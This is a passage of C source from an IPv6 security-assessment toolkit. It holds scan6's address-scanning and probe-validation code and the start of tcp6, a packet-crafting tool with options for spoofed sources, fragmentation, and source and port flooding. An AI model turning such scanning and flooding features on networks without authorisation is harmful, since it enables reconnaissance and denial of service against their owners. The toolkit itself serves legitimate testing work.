(hlist->host[j])->ether.a[k]) break; } if(k == ETH_ALEN) break; } if(j < i) continue; } if(inet_ntop(AF_INET6, &((hlist->host[i])->ip6), pv6addr, sizeof(pv6addr)) == NULL){ if(verbose_f>1) puts("inet_ntop(): Error converting IPv6 address to presentation format"); return(-1); } if(flag == PRINT_ETHER_ADDR){ if(ether_ntop( &((hlist->host[i])->ether), plinkaddr, sizeof(plinkaddr)) == 0){ if(verbose_f>1) puts("ether_ntop(): Error converting address"); return(-1); } printf("%s @ %s\n", pv6addr, plinkaddr); } else printf("%s\n", pv6addr); } return 0; } /* * Function: free_host_entries() * * Releases memory allocated for holding IPv6 addresses and Ethernet addresses */ void free_host_entries(struct host_list *hlist){ unsigned int i; for(i=0; i< hlist->nhosts; i++) free(hlist->host[i]); hlist->nhosts=0; /* Set the number of entries to 0, to reflect the released memory */ return; } /* * Function: create_candidate_globals() * * Generates list of cadidate global addresses based on the local Global prefixes and Interface IDs */ int create_candidate_globals(struct iface_data *idata, struct host_list *local, struct host_list *global, \ struct host_list *candidate){ unsigned int i, j, k; struct in6_addr caddr; for(i=0; (i < local->nhosts) && (candidate->nhosts < candidate->maxhosts); i++){ /* Global Address present in "local" list -- shouldn't happen, though */ if((local->host[i])->ip6.s6_addr16[0] == htons(0xfe80)){ /* We create one candidate address with the Interface-ID of the link-local address, for each of the autoconf prefixes */ for(j=0; (j < idata->prefix_ac.nprefix) && (candidate->nhosts < candidate->maxhosts); j++){ for(k=0; k<4; k++) caddr.s6_addr16[k] = (idata->prefix_ac.prefix[j])->ip6.s6_addr16[k]; for(k=4; k<8; k++) caddr.s6_addr16[k] = local->host[i]->ip6.s6_addr16[k]; /* We discard the candidate address if it is already present in the "global" list */ if(is_ip6_in_list(&caddr, global)) continue; if( (candidate->host[candidate->nhosts]=malloc(sizeof(struct host_entry))) == NULL){ if(verbose_f>1) puts("Error allocating memory while creating local -> global list"); return(-1); } bzero(candidate->host[candidate->nhosts], sizeof(struct host_entry)); (candidate->host[candidate->nhosts])->ip6 = caddr; (candidate->host[candidate->nhosts])->ether = (local->host[i])->ether; (candidate->nhosts)++; } } } return 0; } /* * Function: validate_host_entries() * * Tests entries in a list, updates entries with invalid mappings, and removes non-existent addresses */ int validate_host_entries(pcap_t *pfd, struct iface_data *idata, struct host_list *candidate, struct host_list *global){ unsigned int i; struct in6_addr *srcaddrptr; for(i=0; i< candidate->nhosts; i++){ if((candidate->host[i])->flag == INVALID_MAPPING){ srcaddrptr = sel_src_addr_ra(idata, &((candidate->host[i])->ip6)); if(probe_unrec_f){ if(host_scan_local(pfd, idata, srcaddrptr, PROBE_UNREC_OPT, candidate->host[i]) == -1) return(-1); } if( ((candidate->host[i])->flag == INVALID_MAPPING) && probe_echo_f){ if(host_scan_local(pfd, idata, srcaddrptr, PROBE_ICMP6_ECHO, candidate->host[i]) == -1) return(-1); } } if((candidate->host[i])->flag == VALID_MAPPING){ global->host[global->nhosts] = candidate->host[i]; (global->nhosts)++; } else{ free(candidate->host[i]); } } return 0; } /* * Function: valid_icmp6_response() * * Checks whether the response to an ICMPv6 probe is valid */ int valid_icmp6_response(struct iface_data *idata, unsigned char type, struct pcap_pkthdr *pkthdr,\ const u_char *pktdata, unsigned char *pktsent){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6, *ipv6; struct icmp6_hdr *pkt_icmp6, *pkt_icmp6_icmp6, *icmp6; unsigned char *pkt_end; ipv6 = (struct ip6_hdr *) (pktsent + sizeof(struct ether_header)); if(type == PROBE_UNREC_OPT) icmp6 = (struct icmp6_hdr *) ( (char *) ipv6 + sizeof(struct ip6_hdr) + MIN_DST_OPT_HDR_SIZE); else icmp6 = (struct icmp6_hdr *) ( (char *) ipv6 + sizeof(struct ip6_hdr)); pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; switch(type){ case PROBE_ICMP6_ECHO: pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the payload we included in the ICMPv6 Echo Request */ if( (pkt_end - (unsigned char *) pkt_icmp6) < (sizeof(struct icmp6_hdr) + \ ICMPV6_ECHO_PAYLOAD_SIZE) ) return 0; break; case PROBE_UNREC_OPT: pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the embedded payload */ if( (pkt_end - (unsigned char *) pkt_icmp6) < (sizeof(struct icmp6_hdr) + \ + sizeof(struct ip6_hdr) + MIN_DST_OPT_HDR_SIZE + sizeof(struct icmp6_hdr) + \ ICMPV6_ECHO_PAYLOAD_SIZE) ) return 0; break; } /* Check that that the Destination Address of the incoming packet is the same as the one we used for the Source Address of the Probe packet. */ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(ipv6->ip6_src))) return 0; /* Check that the ICMPv6 checksum is correct */ if(in_chksum(pkt_ipv6, pkt_icmp6, pkt_end-((unsigned char *)pkt_icmp6), IPPROTO_ICMPV6) != 0) return 0; switch(type){ case PROBE_ICMP6_ECHO: if(pkt_icmp6->icmp6_data16[0] != icmp6->icmp6_data16[0]){ return 0; } else if(pkt_icmp6->icmp6_data16[1] != icmp6->icmp6_data16[1]){ return 0; } break; case PROBE_UNREC_OPT: pkt_icmp6_icmp6= (struct icmp6_hdr *) ((unsigned char *) pkt_icmp6 + sizeof(struct icmp6_hdr) +\ sizeof(struct ip6_hdr) + MIN_DST_OPT_HDR_SIZE); if(pkt_icmp6_icmp6->icmp6_data16[0] != icmp6->icmp6_data16[0]){ return 0; } else if(pkt_icmp6_icmp6->icmp6_data16[1] != icmp6->icmp6_data16[1]){ return 0; } break; } return 1; } /* * Function: valid_icmp6_response_remote() * * Checks whether the response to an ICMPv6 probe is valid */ int valid_icmp6_response_remote(struct iface_data *idata, struct scan_list *scan, unsigned char type, struct pcap_pkthdr *pkthdr,\ const u_char *pktdata, unsigned char *pktsent){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6, *ipv6; struct icmp6_hdr *pkt_icmp6, *pkt_icmp6_icmp6, *icmp6; unsigned char *pkt_end; ipv6 = (struct ip6_hdr *) (pktsent + idata->linkhsize); if(type == PROBE_UNREC_OPT) icmp6 = (struct icmp6_hdr *) ( (char *) ipv6 + sizeof(struct ip6_hdr) + MIN_DST_OPT_HDR_SIZE); else icmp6 = (struct icmp6_hdr *) ( (char *) ipv6 + sizeof(struct ip6_hdr)); pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; switch(type){ case PROBE_ICMP6_ECHO: /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the payload we included in the ICMPv6 Echo Request */ if( (pkt_end - (unsigned char *) pkt_icmp6) < (sizeof(struct icmp6_hdr) + \ ICMPV6_ECHO_PAYLOAD_SIZE) ) return 0; break; case PROBE_UNREC_OPT: /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the empedded payload */ if( (pkt_end - (unsigned char *) pkt_icmp6) < (sizeof(struct icmp6_hdr) + \ + sizeof(struct ip6_hdr) + MIN_DST_OPT_HDR_SIZE + sizeof(struct icmp6_hdr) + \ ICMPV6_ECHO_PAYLOAD_SIZE) ) return 0; break; } /* Check that that the Destination Address of the incoming packet is the same as the one we used for the Source Address of the Probe packet. */ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(ipv6->ip6_src))) return 0; /* Check that the ICMPv6 checksum is correct */ if(in_chksum(pkt_ipv6, pkt_icmp6, pkt_end-((unsigned char *)pkt_icmp6), IPPROTO_ICMPV6) != 0) return 0; switch(type){ case PROBE_ICMP6_ECHO: if(pkt_icmp6->icmp6_data16[0] != icmp6->icmp6_data16[0]){ return 0; } else if(pkt_icmp6->icmp6_data16[1] != icmp6->icmp6_data16[1]){ return 0; } break; case PROBE_UNREC_OPT: pkt_icmp6_icmp6= (struct icmp6_hdr *) ((unsigned char *) pkt_icmp6 + sizeof(struct icmp6_hdr) +\ sizeof(struct ip6_hdr) + MIN_DST_OPT_HDR_SIZE); if(pkt_icmp6_icmp6->icmp6_data16[0] != icmp6->icmp6_data16[0]){ return 0; } else if(pkt_icmp6_icmp6->icmp6_data16[1] != icmp6->icmp6_data16[1]){ return 0; } break; } return 1; } /* * Function: process_config_file() * * Processes the SI6 Networks' toolkit configuration file */ int process_config_file(const char *path){ FILE *fp; char *key, *value; char line[MAX_LINE_SIZE]; int r; unsigned int ln=1; if( (fp=fopen(path, "r")) == NULL){ return(0); } while(fgets(line, sizeof(line), fp) != NULL){ r=keyval(line, Strnlen(line, MAX_LINE_SIZE), &key, &value); if(r == 1){ if(strncmp(key, "OUI-Database", MAX_VAR_NAME_LEN) == 0){ strncpy(fname, value, MAX_FILENAME_SIZE-1); fname[MAX_FILENAME_SIZE-1]=0; fname_f=TRUE; } } else if(r == -1){ if(verbose_f){ printf("Error in configuration file %s", configfile); } fclose(fp); return(0); } ln++; } fclose(fp); if(!fname_f) strncpy(fname, "/usr/share/ipv6toolkit/oui.txt", MAX_FILENAME_SIZE-1); return(1); } /* * Function: is_ip6_in_scan_list() * * Check whether an IPv6 address belongs to one of our scan ranges */ int is_ip6_in_scan_list(struct scan_list *scan, struct in6_addr *ip6){ unsigned int i, j; for(i=0; i< scan->ntarget; i++){ for(j=0; j<8; j++){ if( (ntohs(ip6->s6_addr16[j]) < ntohs((scan->target[i])->start.s6_addr16[j])) || \ (ntohs(ip6->s6_addr16[j]) > ntohs((scan->target[i])->end.s6_addr16[j]))){ break; } } if(j == 8) return(1); } return(0); } /* * Handler for the ALARM signal. * * Used for setting a timeout on libpcap reads */ void local_sig_alarm(int num){ if(canjump == 0) return; siglongjmp(env, 1); } ipv6toolkit-1.5.1/tools/scan6.h000066400000000000000000000044351223702747200163470ustar00rootroot00000000000000/* * Header file for the scan6 tool * */ #define BUFFER_SIZE 65556 /* Constants used with the multi_scan_local() function */ #define PROBE_ICMP6_ECHO 1 #define PROBE_UNREC_OPT 2 #define PROBE_TCP 3 #define LOCAL_SRC 1 #define GLOBAL_SRC 2 #define ICMPV6_ECHO_PAYLOAD_SIZE 56 #define MAX_IPV6_ENTRIES 65000 /* Constant for the host-scanning functions */ #define PRINT_ETHER_ADDR 1 #define NOT_PRINT_ETHER_ADDR 0 #define VALID_MAPPING 1 #define INVALID_MAPPING 0 /* Constants used with the libcap functions */ #define PCAP_ICMPV6_FILTER "icmp6" #define PCAP_ICMPV6_NA_FILTER "icmp6 and ip6[7]==255 and ip6[40]==136 and ip6[41]==0" #define PCAP_ICMPV6_RANS_FILTER "icmp6 and ip6[7]==255 and ((ip6[40]==134 and ip6[41]==0) or (ip6[40]==135 and ip6[41]==0))" #define PCAP_ICMPV6_ERNS_FILTER "icmp6 and ((ip6[40]==129 and ip6[41]==0) or (ip6[40]==135 and ip6[41]==0))" #define PCAP_ICMPV6_ERRORNS_FILTER "icmp6 and ((ip6[40]==4) or (ip6[40]==135 and ip6[41]==0))" #define PCAP_ICMPV6_ERQNSNA_FILTER "icmp6 and ((ip6[40]==129 and ip6[41]==0) or ((ip6[40]==135 or ip6[40]==136) and ip6[41]==0 and ip6[7]==255))" #define PCAP_ICMPV6_ERRORNSNA_FILTER "icmp6 and ((ip6[40]==4) or ((ip6[7]==255 and ip6[41]==0) and (ip6[40]==135 or ip6[40]==136)))" #define PCAP_TCP_NSNA_FILTER "(ip6 and tcp) or (icmp6 and ip6[7]==255 and ip6[41]==0 and (ip6[40]==135 or ip6[40]==136))" /* Remote scans */ #define LOW_BYTE_1ST_WORD_UPPER 0x1500 #define LOW_BYTE_2ND_WORD_UPPER 0x0100 #define EMBEDDED_PORT_2ND_WORD 5 #define MAX_IEEE_OUIS_LINE_SIZE 160 #define OUI_HEX_STRING_SIZE 5 #define MAX_IEEE_OUIS 1000 #define MAX_SCAN_ENTRIES 65535 #define MAX_PREF_ENTRIES MAX_SCAN_ENTRIES #define SELECT_TIMEOUT 4 #define MAX_RANGE_STR_LEN 79 #define MIN_INC_RANGE 1000 /* #define MAX_DESTNATIONS 65535 */ #define MAX_IID_ENTRIES 65535 #define ND_RETRIES 0 /* Constants for config file processing */ #define MAX_LINE_SIZE 250 #define MAX_VAR_NAME_LEN 100 #define MAX_FILENAME_SIZE 250 /* Stores one remote target to scan */ struct scan_entry{ struct in6_addr start; struct in6_addr end; struct in6_addr cur; }; /* Store the list of remote targets to scan */ struct scan_list{ struct scan_entry **target; unsigned int ctarget; unsigned int ntarget; unsigned int maxtarget; unsigned int inc; }; ipv6toolkit-1.5.1/tools/tcp6.c000066400000000000000000002330141223702747200162010ustar00rootroot00000000000000/* * tcp6 : A security assessment tool that exploits potential flaws in the * processing of TCP/IPv6 packets * * Copyright (C) 2011-2013 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * Build with: make tcp6 * * It requires that the libpcap library be installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef __linux__ #include #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) #include #endif #include #include "ipv6toolkit.h" #include "tcp6.h" #include "libipv6.h" /* Function prototypes */ void init_packet_data(struct iface_data *); int is_valid_tcp_segment(struct iface_data *, const u_char *, struct pcap_pkthdr *); void send_packet(struct iface_data *, const u_char *, struct pcap_pkthdr *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); void frag_and_send(struct iface_data *); unsigned int queue_data(struct queue *, unsigned char *, unsigned int); unsigned int dequeue_data(struct queue *, unsigned char *, unsigned int); unsigned int queue_copy(struct queue *, unsigned char *, unsigned int, unsigned char *, unsigned int); unsigned int queue_remove(struct queue *, unsigned char *, unsigned int); void queue_purge( struct queue *); int tcp_init(struct tcp *); int tcp_open(struct iface_data *, struct tcp *, unsigned int); int tcp_close(struct iface_data *, struct tcp *); int tcp_send(struct iface_data *, struct tcp *, unsigned char *, unsigned int); int tcp_receive(struct iface_data *, struct tcp *, unsigned char *, unsigned int); int tcp_input(struct iface_data *, struct tcp *, const u_char *, struct pcap_pkthdr *, struct packet *); int tcp_output(struct iface_data *, struct tcp *, struct packet *, struct timeval *); int is_valid_tcp_segment(struct iface_data *, const u_char *, struct pcap_pkthdr *); /* Flags */ unsigned char floodt_f=0; unsigned char listen_f=0, accepted_f=0, loop_f=0, sleep_f=0; unsigned char hoplimit_f=0, rand_link_src_f=0, rand_src_f=0; unsigned char floods_f=0, floodp_f=0, donesending_f=0, startclose_f=0; unsigned char data_f=0, senddata_f=0, useaddrkey_f=0, window_f=0, winmodulate_f=0; /* Flags used for TCP (specifically) */ unsigned char srcport_f=0, dstport_f=0; unsigned char tcpseq_f=0, tcpack_f=0, tcpurg_f=0, tcpflags_f=0, tcpwin_f=0; unsigned char rhbytes_f=0, tcpflags_auto_f=0, tcpopen_f=0, tcpclose_f=0; unsigned char pps_f=0, bps_f=0, debug_f=0, probe_f=0, retrans_f=0, rto_f=0; unsigned char ackdata_f=1, ackflags_f=1; unsigned int debug, tcpopen=0, tcpclose=0, win1_size=0, win2_size=0, window=0, time1_len=0, time2_len=0; u_int16_t srcport, dstport, tcpurg, tcpwin, tcpwinm; unsigned int retrans, rto; u_int32_t tcpseq, tcpack; u_int8_t tcpflags=0, pkt_tcp_flags; struct tcp_hdr *rhtcp; unsigned int rhbytes, currentsize, packetsize; /* Used for router discovery */ struct iface_data idata; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end; struct ether_header *pkt_ether; struct nd_neighbor_solicit *pkt_ns; struct ip6_hdr *pkt_ipv6; struct tcp_hdr *pkt_tcp; struct in6_addr *pkt_ipv6addr; unsigned int pktbytes; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; char data[DATA_BUFFER_LEN]; unsigned int datalen; char iface[IFACE_LENGTH]; char line[LINE_BUFFER_SIZE]; struct ip6_hdr *ipv6; struct tcp_hdr *tcp; struct ether_header *ethernet; struct nd_opt_tlla *tllaopt; struct in6_addr targetaddr, randprefix; struct ether_addr linkaddr[MAX_TLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; char *lasts, *rpref; char *charptr; size_t nw; unsigned long ul_res, ul_val, rate; unsigned int i, j, startrand; unsigned int skip; unsigned int sources, nsources, ports, nports, nsleep; unsigned char randpreflen; u_int16_t mask; u_int8_t hoplimit; u_int16_t addr_key; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragh_f=0; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; struct filters filters; int main(int argc, char **argv){ extern char *optarg; char *endptr; /* Used by strtoul() */ fd_set sset, rset; /* fd_set wset, eset; */ int r, sel; struct timeval timeout, stimeout, curtime, lastprobe, wmtimeout; /*struct tcp tcb; */ /* unsigned char end_f=0, error_f; */ unsigned char end_f=0; unsigned long pktinterval=0; /*Add datasent=0*/ unsigned int retr=0; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"open-mode", required_argument, 0, 'c'}, {"close-mode", required_argument, 0, 'C'}, {"data", required_argument, 0, 'Z'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"payload-size", required_argument, 0, 'P'}, {"src-port", required_argument, 0, 'o'}, {"dst-port", required_argument, 0, 'a'}, {"tcp-flags", required_argument, 0, 'X'}, {"tcp-seq", required_argument, 0, 'q'}, {"tcp-ack", required_argument, 0, 'Q'}, {"tcp-urg", required_argument, 0, 'V'}, {"tcp-win", required_argument, 0, 'w'}, {"window-mode", required_argument, 0, 'W'}, {"win-modulation", required_argument, 0, 'M'}, {"not-ack-data", no_argument, 0, 'N'}, {"not-ack-flags", no_argument, 0, 'n'}, {"block-src-addr", required_argument, 0, 'j'}, {"block-dst-addr", required_argument, 0, 'k'}, {"block-link-src-addr", required_argument, 0, 'J'}, {"block-link-dst-addr", required_argument, 0, 'K'}, {"accept-src-addr", required_argument, 0, 'b'}, {"accept-dst-addr", required_argument, 0, 'g'}, {"accept-link-src-addr", required_argument, 0, 'B'}, {"accept-link-dst-addr", required_argument, 0, 'G'}, {"flood-sources", required_argument, 0, 'F'}, {"flood-ports", required_argument, 0, 'T'}, {"rand-src-addr", no_argument, 0, 'f'}, {"rand-link-src-addr", no_argument, 0, 'R'}, {"loop", no_argument, 0, 'l'}, {"rate-limit", required_argument, 0, 'r'}, {"sleep", required_argument, 0, 'z'}, {"listen", no_argument, 0, 'L'}, {"probe", no_argument, 0, 'p'}, {"retrans", required_argument, 0, 'x'}, {"verbose", no_argument, 0, 'v'}, {"debug", required_argument, 0, 'Y'}, {"help", no_argument, 0, 'h'} }; char shortopts[]= "i:s:d:A:c:C:Z:u:U:H:y:S:D:P:o:a:X:q:Q:V:w:W:M:Nnj:k:J:K:b:g:B:G:F:T:fRlr:z:Lpx:vyY:h"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } hoplimit=255; pktinterval= 0; lastprobe.tv_sec= 0; lastprobe.tv_usec= 0; /* Initialize filters structure */ if(init_filters(&filters) == -1){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option){ case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if(idata.srcaddr_f){ puts("Error: Multiple '-s' options have been specified"); exit(EXIT_FAILURE); } if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } if(idata.srcpreflen == 64) useaddrkey_f= 1; sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ if( inet_pton(AF_INET6, optarg, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'c': if(strncmp(optarg, "simultaneous", MAX_CMDLINE_OPT_LEN) == 0){ tcpopen= OPEN_SIMULTANEOUS; } else if(strncmp(optarg, "passive", MAX_CMDLINE_OPT_LEN) == 0){ tcpopen= OPEN_PASSIVE; } else if(strncmp(optarg, "abort", MAX_CMDLINE_OPT_LEN) == 0){ tcpopen= OPEN_ABORT; } else if(strncmp(optarg, "active", MAX_CMDLINE_OPT_LEN) == 0){ tcpopen= OPEN_ACTIVE; } else{ puts("Error: Unknown open mode in '-c' option"); exit(EXIT_FAILURE); } tcpopen_f=1; break; case 'C': if(strncmp(optarg, "simultaneous", MAX_CMDLINE_OPT_LEN) == 0){ tcpclose= CLOSE_SIMULTANEOUS; } else if(strncmp(optarg, "passive", MAX_CMDLINE_OPT_LEN) == 0){ tcpclose= CLOSE_PASSIVE; } else if(strncmp(optarg, "abort", MAX_CMDLINE_OPT_LEN) == 0){ tcpclose= CLOSE_ABORT; } else if(strncmp(optarg, "active", MAX_CMDLINE_OPT_LEN) == 0){ tcpclose= CLOSE_ACTIVE; } else if( strncmp(optarg, "fin-wait-1", MAX_CMDLINE_OPT_LEN) == 0 || \ strncmp(optarg, "FIN-WAIT-1", MAX_CMDLINE_OPT_LEN) == 0){ tcpclose= CLOSE_FIN_WAIT_1; } else if( strncmp(optarg, "fin-wait-2", MAX_CMDLINE_OPT_LEN) == 0 || \ strncmp(optarg, "FIN-WAIT-2", MAX_CMDLINE_OPT_LEN) == 0){ tcpclose= CLOSE_FIN_WAIT_2; } else if( strncmp(optarg, "last-ack", MAX_CMDLINE_OPT_LEN) == 0 || \ strncmp(optarg, "LAST-ACK", MAX_CMDLINE_OPT_LEN) == 0){ tcpclose= CLOSE_LAST_ACK; } else{ puts("Error: Unknown close option ('-C')"); exit(EXIT_FAILURE); } tcpclose_f=1; break; case 'Z': /* Data */ datalen= Strnlen(optarg, MAX_CMDLINE_OPT_LEN); if(datalen >= DATA_BUFFER_LEN) datalen= DATA_BUFFER_LEN-1; strncpy(data, optarg, DATA_BUFFER_LEN-1); data_f=1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen <= 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; fragh_f= 1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source 